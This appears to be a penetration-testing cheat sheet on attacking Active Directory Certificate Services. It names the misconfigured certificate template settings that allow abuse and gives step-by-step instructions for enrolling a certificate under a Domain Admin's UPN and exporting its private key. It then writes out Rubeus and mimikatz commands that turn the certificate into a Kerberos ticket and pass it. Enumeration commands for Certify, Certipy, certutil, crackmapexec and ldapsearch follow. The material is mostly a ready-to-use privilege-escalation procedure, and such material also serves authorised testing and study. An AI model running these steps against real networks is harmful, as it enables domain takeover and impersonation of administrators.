AD Certificates Exploitation

AD Certificates Exploitation and Enumeration

ADCS Various Exploitation methods and misconfigurations

Resources are mostly from: hacktricks.xyz

Possible tools to use: PSPKIAudit, Certify https://github.com/GhostPack/Certify , Certipy https://github.com/ly4k/Certipy , Certi https://github.com/zer1t0/certi , modifyCertTemplate https://github.com/fortalice/modifyCertTemplate

Poisonous parameter combination on certificates

1) Client Authentication = Can be used for client authentication

2) Certificate Permissions = We have the required permissions to use the certificate template (Allow enroll/Allow Full Control)

3) CT_FLAG_ENROLEE_SUPPLIES_SUBJECT = The certificate template allows us to specify the Subject Alternative Name (SAN) (Value=1)

4) CTPRIVATEKEY_FLAG_EXPORTABLE_KEY = The certificate will be exportable with the private key

TIP: Disable Restricted Admin mode

1) Start -> Run

2) mmc

3) Click file -> Add/Remove Snap-in

4) Add the certificates snap-in and make sure to select Computer Account and Local computer on the prompts

5) OK

Request a personal certificate

1) Right click on Personal and select All Tasks -> Request New Certificate

2) Click Next twice to select the AD Enrollment policy

3) You will see that we have one template that we can request, but first, we need to provide additional information.

4) More information warning (click)

5) Change the Subject name Type option to Common Name and provide any value, since it doesn't matter, and click Add.

6) Change the Alternative name Type option to User Principal Name (UPN)

7) Supply the UPN of the user you want to impersonate ( It can be a Domain Admin account NAME@DOMAIN and click Add

8) Apply and OK. Select certificate and click Enroll

Export Certificate

9) Right click on the certificate and select ALL Tasks -> Export

10) Click next, select yes, export the private key, then next

11) Next, then set password for the certificate since the private key cannot be exported without a password

12) Next and select a location to store certificate

13) Next and Finally, Finish.

Impersonation through a certificate

1) Rubeus.exe asktgt /user:USER /enctype:aes256 /certificate:PATH/TO/CERTIFICATE /password:CERT_PASS /outfile:TICKET.KIRBI /domain:DOMAIN /dc:DC_IP

2) mimikatz.exe

3) privilege::debug

4) kerberos::ptt TICKET.KIRBI

5) exit

6) ENJOY!

AD Certificate Services Enumeration

AD's certificate services can be enumerated through LDAP queries, revealing information about Enterprise Certificate Authorities (CAs) and their configurations. This is accessible by any domain-authenticated user without special privileges. Tools like Certify and Certipy are used for enumeration and vulnerability assessment in AD CS environments.

Commands:

1) Enumerate trusted root CA certificates and Enterprise CAs with Certify

Certify.exe cas 

2) Identify vulnerable certificate templates with Certify

Certify.exe find /vulnerable 

3) Use Certipy for enumeration and identifying vulnerable templates

certipy find -vulnerable -u john@corp.local -p Passw0rd -dc-ip 172.16.126.128 

Enumerate Enterprise CAs and certificate templates with certutil

certutil.exe -TCAInfo

certutil -v -dstemplate

Enumerate AD Enterprise CAs

certutil.exe -config - -ping , certutil -dump 

Find ADCS Server

crackmapexec ldap domain.lab -u username -p password -M adcs 

ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=USER,OU=USERS,DC=DOMAIN,DC=LOCAL' -w 'PASSWORD' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=DOMAIN,DC=LOCAL" dNSHostName